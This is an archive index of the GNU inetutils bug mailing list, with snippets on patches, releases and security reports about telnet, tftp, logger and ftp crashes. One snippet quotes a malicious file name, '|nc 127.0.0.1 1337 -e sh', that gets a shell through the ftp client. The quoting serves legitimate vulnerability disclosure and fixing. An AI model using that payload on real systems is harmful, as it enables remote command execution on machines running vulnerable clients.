Re: Reproducible tarballs

Collin Funk writes: > Hi Simon, > > On 5/12/24 3:56 AM, Simon Josefsson via Bug reports for the GNU Internet > utilities wrote: >> I have committed the attached patches giving us reproducible tarballs. >> >> The particular logic to verify this continously is

Reproducible tarballs

All, I have committed the attached patches giving us reproducible tarballs. The particular logic to verify this continously is in the 000-reproducibility pipeline job, code here: https://gitlab.com/gnulib/pipeline/-/blob/5b224c783dc4d3ef125f1d3974d895178a820c95/gnu/inetutils.yml#L284 Build

Re: telnet: Make function declarations C23 compatible.

Collin Funk writes: > With an exception for some Kerberos 4 stuff, which I cannot test. I > assume the plan is still to remove that as mentioned in TODO? Let's keep that question open for a while more... > Also I think that ./configure --with-shishi is broken, or maybe it is > because I have

Re: libtelnet: Make encryption decls compatible with C23.

Collin Funk writes: > On 5/10/24 6:52 AM, Simon Josefsson wrote:>> $ ./configure > CC="gcc-14.1" CFLAGS="-std=c23 -Wstrict-prototypes" > --enable-authentication --enable-encryption --with-krb5 >> >> Ah, you answered my request from the earlier email already :-) > > :) > >> Looks good, and yes

Re: libtelnet: Make encryption decls compatible with C23.

Collin Funk writes: > I've applied the attached patch to fix the following error building > libtelnet. I think the only ones remaining are in telnet/*. Once I fix > that maybe these are good for an existing CI job? > > $ ./configure CC="gcc-14.1" CFLAGS="-std=c23 -Wstrict-prototypes" >

Re: maint: Fix most instances of '-Wstrict-prototypes'.

Collin Funk writes: > Hi, > > I've pushed this patch already because it seems pretty > uncontroversial. > > Basically converting some K functions to ISO C and not using empty > argument lists: Thanks -- okay with me, although it would have been nice to setup some way to reproduce the issue and

Re: Gnulib & bootstrap updates

Collin Funk writes: > Hi Simon and Gulliem, > > On 5/8/24 1:06 PM, Simon Josefsson via Bug reports for the GNU Internet > utilities wrote: >> Hi Guillem. I added the bootstrap files to the tarball now. >> >> I'm not convinced that this is a good idea, so let's

Re: maint: Remove unnecessary standard library extern function decls.

Collin Funk writes: > Hi Simon, > > Are you okay with me pushing the following two patches? > > Patch 0001 removes most (all?) of the extern function decls that > should be in the standard library. They seems harmless, but maybe they > can mess with Gnulib declarations. We should probably just

Re: Gnulib & bootstrap updates

Guillem Jover writes: > Hi! > > On Mon, 2024-05-06 at 18:12:53 +0200, Simon Josefsson via Bug reports for the > GNU Internet utilities wrote: >> I have updated inetutils to latest gnulib (to get the u_* syntax-check >> fixes, and the new faster gnulib-tool.py) and

Re: ifconfig: Fix ASAN 'dynamic-stack-buffer-overflow' in formatting.

Collin Funk writes: > On 5/6/24 6:03 PM, Collin Funk wrote: >> So I am confident it is a bug. I've applied the attached patch which >> seems to fix the issue. This is based on a quick glance of the code so >> I would appreciate others looking it over. Thanks! Thank you! I think we should

Re: cfg.mk: Add checks for 'caddr_t'.

Collin Funk writes: >> I do mostly agree, however there is another concern: frivolious changes >> like this makes it harder to align code with BSD implementations for >> auditing and security backports. I've sporadically coordinated some >> security fixes with tnftp which seems to be the

Gnulib & bootstrap updates

I have updated inetutils to latest gnulib (to get the u_* syntax-check fixes, and the new faster gnulib-tool.py) and refreshed the bootstrap scripts, please test and report if something broke! /Simon signature.asc Description: PGP signature

Re: cfg.mk: Add checks for 'caddr_t'.

Collin Funk writes: > There are some uses of 'caddr_t' in Inetutils. This is a prehistoric > BSD type. I think it was because early versions of C didn't > automatically convert 'void *' to the appropriate type. ... > Patch 0001 adds a syntax check for this type and patch 0002 removes > it's uses

Re: cfg.mk: Add checks for 'u_int'.

Collin Funk writes: > At some point someone added syntax-checks to fail if old BSD types > where used: > > u_char -> unsigned char > u_short -> unsigned short > u_long -> unsigned long > > But they forgot to do u_int. Patch 0001 adds one for u_int and patch > 0002 removes them.

Re: Indentation mistake

Collin Funk writes: > Hi Simon, > > On 5/2/24 11:25 AM, Simon Josefsson via Bug reports for the GNU Internet > utilities wrote: >>> Sadly, I cannot do this, at least not easily. After installing GNU >>> indent, "make syntax-check" complains about ma

Re: Indentation mistake

Erik Auerswald writes: > Hi Simon, > > On Thu, May 02, 2024 at 08:08:07PM +0200, Simon Josefsson wrote: >> tor 2024-05-02 klockan 20:05 +0200 skrev Erik Auerswald: >> > On Thu, May 02, 2024 at 07:55:23PM +0200, Simon Josefsson via Bug >> > reports for

Re: Indentation mistake (was: Is TODO up-to-date?)

tor 2024-05-02 klockan 20:05 +0200 skrev Erik Auerswald: > Hi Simon, > > On Thu, May 02, 2024 at 07:55:23PM +0200, Simon Josefsson via Bug > reports for the GNU Internet utilities wrote: > > [...] > > I worry about self-tests though, it would be nice to beef up on > &g

Re: Is TODO up-to-date?

Collin Funk writes: > Hi, > > Is the TODO file generally up-to-date? Now that I have my copyright > assignment done, maybe I can find some stuff to hack on. Yay! > Specifically, are these items still true? I think you should pretty much assume very little is up to date or correct in

Re: [PATCHv2] ifconfig: prefix length handling fixes for -A

Erik Auerswald writes: > I have done that in the attached patch. > > I plan to push the changes in a couple of days, unless I receive negative > feedback. Looks great, thank you. /Simon signature.asc Description: PGP signature

Re: memset_explicit: Fix compilation error on some OpenSolaris derivatives

Collin Funk writes: > Hi Paul, > > On 4/23/24 11:22 PM, Paul Eggert wrote: >> Why is telnetd.h including config.h? Only a top-level C file should >> include config.h, and it should so so at the start. > > I don't disagree. Most of those lines are 20 years old, so I assume it > wasn't a problem

Re: [PATCH] ifconfig: prefix length handling fixes for -A

Erik Auerswald writes: > Hi, > > while "ifconfig -A" now accepts CIDR notation, it does not reject prefix > length values outside of [0,32]. Also, with a prefix length of 0, > undefined begavior is invoked, and at least on x86_64 a wrong netmask > is computed. > > I think the attached patch

Re: [PATCH] maint: Allow gnulib's readutmp module to use systemd.

Collin Funk writes: > Hi Simon, > > On 3/22/24 12:51 PM, Simon Josefsson wrote: >> Hi. Nice catch, thank you. I have added a CI/CD job to catch -lsystemd >> regressions in the future: > > Nice, looks good to me. > >> Thank you for details -- I think this is somewhat subjective, but I do >>

Re: [PATCH] maint: Allow gnulib's readutmp module to use systemd.

Collin Funk writes: > When building on GNU/Linux with: > > ./configure --enable-systemd > > there are linker errors due to '-lsystemd' not being passed to the > linker. This is used by Gnulib's readutmp module. Hi. Nice catch, thank you. I have added a CI/CD job to catch -lsystemd regressions

Re: ctime uses in inetutils

Simon Josefsson via Bug reports for the GNU Internet utilities writes: > FYI, I have reluctantly needed convince myself that inetutils has bugs > related to ctime for years < 1000 or year > and that this is > something that needs to be fixed rather than ignored as irrelevant

ctime uses in inetutils

FYI, I have reluctantly needed convince myself that inetutils has bugs related to ctime for years < 1000 or year > and that this is something that needs to be fixed rather than ignored as irrelevant (which was my initial reaction):

Re: 2.5, 2.4 and 2.3 of inetutils...

Marty Kazmaier writes: > All give me: > > tftpsubs.c:68:10: fatal error: arpa/tftp.h: No such file or directory >68 | #include > > > When running 'make' on them. ./configure runs fine. I'm using > Windows 10 x64 Pro. What could I possibly be doing wrong? I don't > think I'm missing any

Re: error compiling inetutils 2.5 on macOS Sonoma

Erik A Johnson writes: > compiling inetutils 2.5 on macOS Sonoma gives an error compiling > src/syslogd.c because the third argument in the prototype for ttymsg > is "char *" but macOS /usr/include/util.h has it as "const char *”. Thanks for testing! See existing report here:

inetutils-2.5 released [stable]

This is to announce inetutils-2.5, a stable release. GNU Networking Utilities (inetutils) contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger. There

Re: [PATCH] traceroute: Fix hangs or delays in timeout

James R T writes: > Hi Simon, > > I have filled out the copyright assignment form accordingly. Have you heard back from the FSF on this? It would be nice to review and merge your patch eventually. /Simon > The traceroute implementation by Dmitry Butskoy does not have this > issue. Hence, it

Re: ftp mdtm: invalid command

"Felipe G. Nievinski" writes: > Sorry if it's a silly question, but wouldn't it be better for the FTP > client to support the command names as standardized in IETF RFCs? I don't think that is better -- the "names" in the RFCs are cryptic protocol names, usually not useful for a human interface.

Re: ftp mdtm: invalid command

Erik Auerswald writes: > Hi, > > On Wed, Aug 02, 2023 at 04:01:00PM -0300, Felipe G. Nievinski wrote: >> >> I'm using the FTP utility, which supposedly supports the MDTM command (as >> per section 21.1 Standards of the documentation): >>

Re: setuid/setgid return values not checked in rlogin, rsh, rshd and uucpd

Jeffrey writes: > Patch attached. Thank you! I have pushed this to git. Next time, please run 'make syntax-check' to check your patches (code indentation caused troubles now, but I fixed it) and feel free to include the NEWS blurb in the git patch itself. I'll reach out to the netbsd-tnftpd

Re: setuid/setgid return values not checked in rlogin, rsh, rshd and uucpd

Jeffrey writes: > I found more occurences of unchecked values for set*id() functions in other > inetutils programs: ftpd, rcp. > > It has different security impact if it can be triggered: > > * rcp: local privilege escalation to the user running the binary > * ftpd: undefined behaviour without

Re: setuid/setgid return values not checked in rlogin, rsh, rshd and uucpd

Thank you Jeffrey, have you signed the copyright assignment form? I'll email it to you privately. /Simon signature.asc Description: PGP signature

Re: [PATCH] traceroute: Fix hangs or delays in timeout

Thank you! I was also thinking more how it compares to the "old" traditional traceroute implementations found in BSD's. I'll review the code more carefully when the assignment is complete, and hopefully merge it as-is. /Simon mån 2023-04-24 klockan 17:01 +0800 skrev James R T: > Hi Simon, > >

Re: [PATCH] traceroute: Fix hangs or delays in timeout

Hi. Thank you -- I have sent you the copyright assignment form separately. Meanwhile, could you say something about how other traceroute implementations behave here? Does this patch make ours more consistent with the rest, or is this an area where implementations behave differently? /Simon

Re: ICMPv4 Type 3 Code 13 not implemented

Erik Auerswald writes: > Hi, > > On Sat, Jan 21, 2023 at 04:16:59PM +, Marco wrote: >> >> inetutils-telnet doesn't seem to implement ICMPv4 correctly. > > The telnet client does not use ICMP directly. > >> It doesn't print a proper message when ICMPv4 Type 3 Code 13 is being >> received,

Re: [PATCH] ping: decode unreachable codes added in RFC 4443

Enrik Berkhan writes: > RFC 4443 added two new codes for ICMPv6 destination unreachable messages > (type 1): > > 5 - Source address failed ingress/egress policy > 6 - Reject route to destination Hi Enrik. Thank you, I have pushed this:

inetutils-2.4 released [stable]

We are pleased to announce version 2.4 of The GNU Networking Utilities. GNU Networking Utilities contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger.

Re: Fwd: freeport(1)

Hi Thanks for the contribution. Given the simplicity of this tool, together with the inherent race condition, and the availability of a shell script that offers similar functionality suggested by Alex Colomar in a reply, my preference is that it is not worth the maintenance burden to introduce a

Re: [PATCH] ifconfig: Support prefix length.

I have committed this patch here: https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=afe3168ee9f15783c71653bee0ec97536daaf217 Btw, please add NEWS entries next time. I added the following, corrections welcome:

Re: [PATCH] ifconfig hurd: Notify pfinet of interfaces

Hi. I have commited this now: https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=0b35abbd7a5d074c7e245a49585b2de036d4dec7 /Simon signature.asc Description: PGP signature

Re: [PATCH] ifconfig hurd: Notify pfinet of interfaces

Samuel Thibault writes: > Hello, > > Simon Josefsson, le mer. 28 sept. 2022 13:46:52 +0200, a ecrit: >> have you signed copyright assignment papers for InetUtils, > > I didn't know there was copyright assignment for InetUtils :/ > > I now have sent the form to the clerk, but really, such process

Re: [PATCH] ifconfig hurd: Notify pfinet of interfaces

Both your patches looks good to me -- however, have you signed copyright assignment papers for InetUtils, or how are these contributed? Generally I'm not sure how useful it is to require copyright assignment for smaller InetUtils contributions -- the majority of the code is not copyright by FSF

Re: How to check for perl or usable printf tools?

Erik Auerswald writes: > Hello Simon, > > On 25.09.22 11:19, Simon Josefsson wrote: >> Erik Auerswald writes: >> >>> Hi all, >>> >>> On Mon, Sep 12, 2022 at 12:45:32PM +0200, Erik Auerswald wrote: On Mon, Sep 12, 2022 at 05:16:00AM -0400, Alfred M. Szmidt wrote: > > I am trying to

Re: How to check for perl or usable printf tools?

Erik Auerswald writes: > Hi all, > > On Mon, Sep 12, 2022 at 12:45:32PM +0200, Erik Auerswald wrote: >> On Mon, Sep 12, 2022 at 05:16:00AM -0400, Alfred M. Szmidt wrote: >> >> I am trying to use the reported input file that crashes tftp for >> >> the test. This file contains

Re: fixing the ftp crashes found via fuzzer

Erik Auerswald writes: > I'll try to commit and push regression tests and fixes for the first, > third, and fourth problem during the weekend. Thank you. > What do you all think regarding recursive macros (the second problem)? Having an arbitrary sized recusion limit of, say, depth 100, while

Re: How to check for perl or usable printf tools?

Erik Auerswald writes: > I am trying to use the reported input file that crashes tftp for the test. > This file contains non-printable characters (i.e., it is a "binary" file). > I do not want to add this binary file as-is to the git repository. Why? I don't see anything fundamentally wrong

Re: TFTP client crash seems to be caused by missing bounds check in makeargv()

Erik Auerswald writes: > Hi Simon, > > On Tue, Sep 06, 2022 at 08:05:04PM +0200, Simon Josefsson wrote: >> Erik Auerswald writes: >> > On 04.09.22 17:34, Erik Auerswald wrote: >> >> On 03.09.22 19:07, Erik Auerswald wrote: >> >>> On Sat, Sep 03, 2022 at 05:39:45PM +0200, Simon Josefsson wrote:

Re: [BUG][PATCH] Someone described a remote DoS Vulnerability in telnetd (dereference NULL pointer ---> SEGV)

Guillem Jover writes: > [ Resending with To trimmed. ] > > Hi! > > On Tue, 2022-08-30 at 22:57:51 +0200, Guillem Jover wrote: >> On Sun, 2022-08-28 at 14:40:44 +0200, Erik Auerswald wrote: >> > On Sat, Aug 27, 2022 at 07:37:15PM +0200, Erik Auerswald wrote: >> > > someone has described a remote

Re: TFTP client crash seems to be caused by missing bounds check in makeargv()

Erik Auerswald writes: > Hi, > > On 04.09.22 17:34, Erik Auerswald wrote: >> On 03.09.22 19:07, Erik Auerswald wrote: >>> On Sat, Sep 03, 2022 at 05:39:45PM +0200, Simon Josefsson wrote: [...] did you notice some fuzzing report that wasn't fixed? >>> [...] >>> * Problems found in tftp

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: >> You might want to take a look at: >> >> > > Thanks for pointing out that patch. Without it telnet crashes when > it starts the

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: >> Please test commit access by pushing the patch, after writing >> a suitable NEWS entry. > > I have just committed and pushed the telnetd crash fix patch[1], > including a NEWS entry. > > [1] https://lists.gnu.org/archive/html/bug-inetutils/2022-08/msg2.html Looks

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

fre 2022-09-02 klockan 20:37 +0200 skrev Erik Auerswald: > Hello Simon, > > On Sat, Jul 09, 2022 at 04:23:20PM +0200, Simon Josefsson wrote: > > [...] > > What's your savannah username? > > [...] > > My Savannah username is "auerswal" > . Welcome!

Re: [BUG][PATCH] Someone described a remote DoS Vulnerability in telnetd (dereference NULL pointer ---> SEGV)

Erik Auerswald writes: >> I have attached a completely untested, not even compile >> tested, patch to do this (just the code changes, no NEWS >> or commit log or anything). Please test before committing. > > I have tested the patch now, it compiles and prevents the > crash by preventing the

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: > The Debian 11 build fails because it attempts to create a release with > a bogus version number. The error is: > > ... > GEN release-prep > announce-gen: ./NEWS: no news item found for '42.4711' > make[3]: *** [maint.mk:1422: announcement] Error

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: > Hello Simon, > > On Sat, Jul 09, 2022 at 02:36:41PM +0200, Simon Josefsson wrote: >> Erik Auerswald writes: >> > On Fri, Jul 08, 2022 at 08:55:18AM +0200, Erik Auerswald wrote: >> >> On Fri, Jul 08, 2022 at 12:58:37AM +0200, Simon Josefsson wrote: >> >> >> >> > Thanks

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: > Hello Simon, > > On Fri, Jul 08, 2022 at 08:55:18AM +0200, Erik Auerswald wrote: >> On Fri, Jul 08, 2022 at 12:58:37AM +0200, Simon Josefsson wrote: >> >> > Thanks for preparing these, I should have read through all posts >> > before started working on them

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

> I think we should reach out to some BSD contacts... http://gnats.netbsd.org/cgi-bin/query-pr-single.pl?number=56918 https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=265097 https://marc.info/?l=openbsd-bugs=165731429324728=2 /Simon signature.asc Description: PGP signature

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

Erik Auerswald writes: > It seems to me as if this Netkit project no longer exists. Since I do > not know the upstream project, I have not report any bugs, and have not > send any patches. Yeah, the NetKit telnet project is in a sad state. > I do not have a BSD system to test, but anyone who

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: > I want to look at your new tests, perhaps I can learn how to add some > tests to verify the genget() functionality. The test suite today is rather limited, as you probably have noticed, but going forward it would really help if we created a self-check that triggers a

inetutils-2.3 released [stable]

We are pleased to announce version 2.3 of The GNU Networking Utilities. GNU Networking Utilities contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger.

Re: Supported TLDs

Marco d'Itri writes: > On Jul 08, Simon Josefsson wrote: > >> I don't know the history of inetutils' fork of (g)whois, is there any >> hope in getting these code-bases merged now? Maybe enough water has >> passed under the bridges... > I see no reasons at this point to tie whois to inetnutils

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Erik Auerswald writes: > I'll try to look into this over the weekend, but I cannot promise > anything. But this patch series should just address the same issues > as the patches I sent before, perhaps with some smaller differences. > It's been some time and I do not remember all the details. I

Re: [PATCH 0/3] GNU inetutils telnet client fixes

Erik Auerswald writes: > Hi, > > On 27.02.22 17:32, Erik Auerswald wrote: >> [...] >> [I have not yet received and answer from the FSF regarding the copyright >> assignment paperwork I have sent.] > > I have just received confirmation that the copyright assignment > has been processed and

Re: [PATCH 3/3] telnet: Avoid command evaluation crashes.

Thanks for preparing these, I should have read through all posts before started working on them separately... so this patch no longer applies as is. Would you like to re-review these, to see if anything more is still needed after I applied some changes? Maybe it is just the NEWS entries. Btw,

Re: [PATCH 2/3] telnet: Fix TTYPE subnegotiation off-by-one error.

Erik Auerswald writes: > Fix off-by-one error in Terminal-Type option subnegotiation if the TERM > variable has exactly 44 bytes. In this case the SE byte (end of > subnegotiation parameters) was replaced by a NUL byte. This concerns > the CVE-2019-0053 fixes. Reported by Erik Auerswald in >

Re: Bug in telnet from inetutils-2.2: Insufficient buffer space for longish DISPLAY names

Erik Auerswald writes: > I have attached the output of "git format-patch origin" after locally > committing the patch for this issue and adding a NEWS entry. Please let > me know if this looks OK. Did I miss anything? Looks good to me, thank you!

Re: Supported TLDs

Chris Reveles writes: > Hello, > > > I hope 2022 is already up to a good start over there. I am doing some > research and I noticed certain TLDs such as .art and .eth are not resolving > properly from the *whois* command, are such domains on the map to be > supported? Thanks for the report -- I

Re: Heap-based Buffer Overflow in logger

AiDai writes: > 0x60c0003f is located 1 bytes to the left of 120-byte region Nice catch! Reproducing it is easy: jas@latte:~/src/inetutils$ valgrind src/logger -s '' ... ==339979== Invalid read of size 1 ==339979==at 0x10AA71: send_to_syslog (logger.c:329) ==339979==by 0x10A5CD:

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

Erik Auerswald writes: >> This happens when the "unset" command is used with a single space as >> argument, because the "Setlist" contains entries for empty lines that use >> a single space as key, but the setlist.handler is 0 and the setlist.charp >> is NULL: >> >> {" ", "", 0, NULL}, >>

Re: NULL Pointer Dereference in setcmd () at commands.c:1152

Erik Auerswald writes: >> A NULL Pointer Dereference was discovered in setcmd () at >> commands.c:1152. The vulnerability causes a segmentation fault and >> application crash. ... > The attached patch "inetutils-telnet-set_null_deref_fix.patch" fixes this > by rejecting a set argument with

Re: NULL Pointer Dereference in unsetcmd() at inetutils/telnet/commands.c:1227

Erik Auerswald writes: >> A NULL Pointer Dereference was discovered in unsetcmd() at >> inetutils/telnet/commands.c:1227. The vulnerability causes a segmentation >> fault and application crash. ... > The attached patch fixes this: Thank you again. Committed as follows:

Re: NULL Pointer Dereference in help()

Erik Auerswald writes: > On Thu, Dec 23, 2021 at 09:15:59PM +0800, AiDai wrote: >> Line 1: # NULL Pointer Dereference in help() at >> inetutils/telnet/commands.c:3094 > > Thanks for fuzzing GNU inetutils! Hi AiDai and Erik. Thanks for the report, debugging and patch! I installed your fixes

Re: [Bug][Patch] Buffer overflow in function makeargv() in telnet/commands.c

Erik Auerswald writes: > The attached patch fixes this. Hi Erik. Wonderful, what a master-piece of a bug report! Patch installed here: https://git.savannah.gnu.org/gitweb/?p=inetutils.git;a=commitdiff;h=f0c2abdbb720d8396061b75cc47d69edab012864 Since the crash was easy to reproduce, I added

Re: Memory leak in ifconfig

AiDai writes: > Direct leak of 64 byte(s) in 1 object(s) allocated from: > #0 0x494bdd in malloc > (/root/disk2/fuzzing/inetutils/fuzz/bin/ifconfig+0x494bdd) > #1 0x4e0330 in linux_if_nameindex > /root/disk2/fuzzing/inetutils/inetutils/ifconfig/./system/linux.c:948:11 > #2 0x4cbfd5

Re: inetutils-2.2 released [stable]

Michael Brunnbauer writes: > Hello Simon, > > it seems to me that the bug which the test code tries to trigger never got > fixed? > > https://sourceware.org/bugzilla/show_bug.cgi?id=11053 Hi. Looks like work on that bug was done shortly after your email, and the last release, and gnulib has

Re: FTP client arbitrary code execution

John Zhau writes: > After some further testing, I've found that I'm still able to get a shell > with the aforementioned payload even with other files in the same > directory. I've also found that I can also get a shell with the following > file name: > > ``` > |nc 127.0.0.1 1337 -e sh > ``` > >

Re: inetutils-2.2 released [stable]

Michael Brunnbauer writes: > hi > > On Sun, Sep 05, 2021 at 11:24:34AM +0200, Simon Josefsson wrote: >> Thanks -- interesting, which operating system is this? Knowing that >> would make it easier for me to reproduce it. > > I compile everything myself - sorry. Maybe the problem has to do with

Re: inetutils-2.2 released [stable]

Michael Brunnbauer writes: > From syslog: > > conftest[30264]: segfault at 0 ip 7f2bfdf50ce7 sp 7fffd3380918 > error 4 in libc.so.6[7f2bfdec9000+167000] > > From config.log: > > configure:37718: checking for working re_compile_pattern > configure:38031: gcc -o conftest -g -O2

inetutils-2.2 released [stable]

We are pleased to announce version 2.2 of The GNU Networking Utilities. GNU Networking Utilities contain traditional networking utilities, clients and servers, including ftp, telnet, inetd, rsh/rlogin, tftp, talk, syslogd, ping, traceroute, whois, hostname, dnsdomainname, ifconfig, and logger.

Re: scurity issue in inetutils ftp client

ZeddYu Lu writes: > Last year, curl had a security update for CVE-2020-8284. more info, see > https://hackerone.com/reports/1040166 > > The problem is ftp client trust the host from PASV response by default, A > malicious server can trick ftp client into connecting back to a given IP > address

Re: Security Vulnerability Reporting

Onur Şahin writes: > Hello, > > I was wondering if there is a process in place for reporting security > vulnerabilities for inetutils? If so, what might that process be? Hi! Right now there isn't much of a formal process -- please post your findings to this mailing list, and we can all try to

Re: A possible hang bug in Telnet

Meng Ruijie writes: > Dear Sir/Madam, > > Sorry to bother you. During testing the Inetutils telnet, I found a > likely hang bug. Hope you could have a check. > > After telnet is connected with a telnet server, a telnet server is > crashed, and then telnet will be blocked forever. The reason

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

Alex Bochannek writes: > Simon Josefsson writes: > >> Alex Bochannek writes: >> >>> Alex Bochannek writes: >>> I keep debugging what's going on there. I have found an interesting, platform-dependent behavior in Emacs that may or may not be related to this problem. >>> >>> I was

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

Alex Bochannek writes: > Alex Bochannek writes: > >> I keep debugging what's going on there. I have found an interesting, >> platform-dependent behavior in Emacs that may or may not be related to >> this problem. > > I was looking at what Bash and tnftp do when they run in an Emacs >

Re: next steps for inetutils?

"Alfred M. Szmidt" writes: >>* Fix All warnings with autoconf 2.71 - I didn't want to touch this >> before 2.0 since we had succesful build reports, but there are > plenty >> of old m4 constructs that we should use gnulib tools for instead. >> >>* use

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

Alex Bochannek writes: >> Probably gnulib's m4/readline.m4 should detect that this particular >> libreadline is not usable, but I wonder exactly what is wrong with it >> (and how to detect that). Maybe it is possible to make it work (the >> problem still seems related to stdin/stdout buffering

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

Alex Bochannek writes: > Simon Josefsson writes: > >>> Is this a known problem? Does this maybe work as intended? >> >> Hi. Thanks for the report. It is not a known problem. The output >> looks weird, and it could be readline or related to buffering. Could >> you debug this further to see

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

Alex Bochannek writes: > Hello! > > I sent in bug 48494: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=48494 > to Emacs, but I am starting to think this might be an inetutils issue. > > I observed that AngeFTP cannot parse the output of the GNU inetutils FTP > client on macOS 10.14. It errors out

Re: syslogd.sh test fails when ipv6 is disabled

> I will report back on the result of upgrading the Guix package of > inetutils to 2.0. Please do -- it should be in the Guix core-updates branch already. /Simon signature.asc Description: This is a digitally signed message part

Re: syslogd.sh test fails when ipv6 is disabled

Bone Baboon writes: > I am using the Guix operating system which is a build from source > operating system. When I build the Guix package for inetutils from > source it fails because the syslogd.sh test fails. I am building the > Guix inetutils package using this Guix command to build

telnet --bind

Hi. I'm trying to get Debian to use inetutils's telnet by default, and one discrepency compared to their current implementation (netkit) was the --bind parameter. It seems useful, so I implemented it in inetutils (see patch below). It appears to work -- notice the different listen addresses in

Re: [PATCH 1/2] whois: .ORG is not handled by InterNIC anymore

Thanks, I have applied these. /Simon signature.asc Description: PGP signature

Re: next steps for inetutils?

I've added these items to TODO, so we don't forget about them. /Simon signature.asc Description: PGP signature

Re: next steps for inetutils?

a...@gnu.org (Alfred M. Szmidt) writes: >* arp tool > >* nc (netcat) tool > > I like these additions, but I am worried about compatibility against > the more prolific versions of those tools. Agreed, an analysis of existing implementations and their differences would be useful. This

next steps for inetutils?

"Alfred M. Szmidt" writes: > I'm ok with doing a release now. I pushed out a stable release now. Let's see if we get more testing than for the pre-releases; we can always release something in the coming weeks/month to fix build/portability stuff. There isn't a lot of testing on BSD, Solaris,

Re: TLS support

"David Diem" writes: > Hello, > > The inetutils /bin/ftp gives back the message "550 SSL/TLS required on > the control channel" in my case. (The debug and verbose command line > options do not produce any more related information than > that). However, other clients (lftp, ncftp, filezilla) do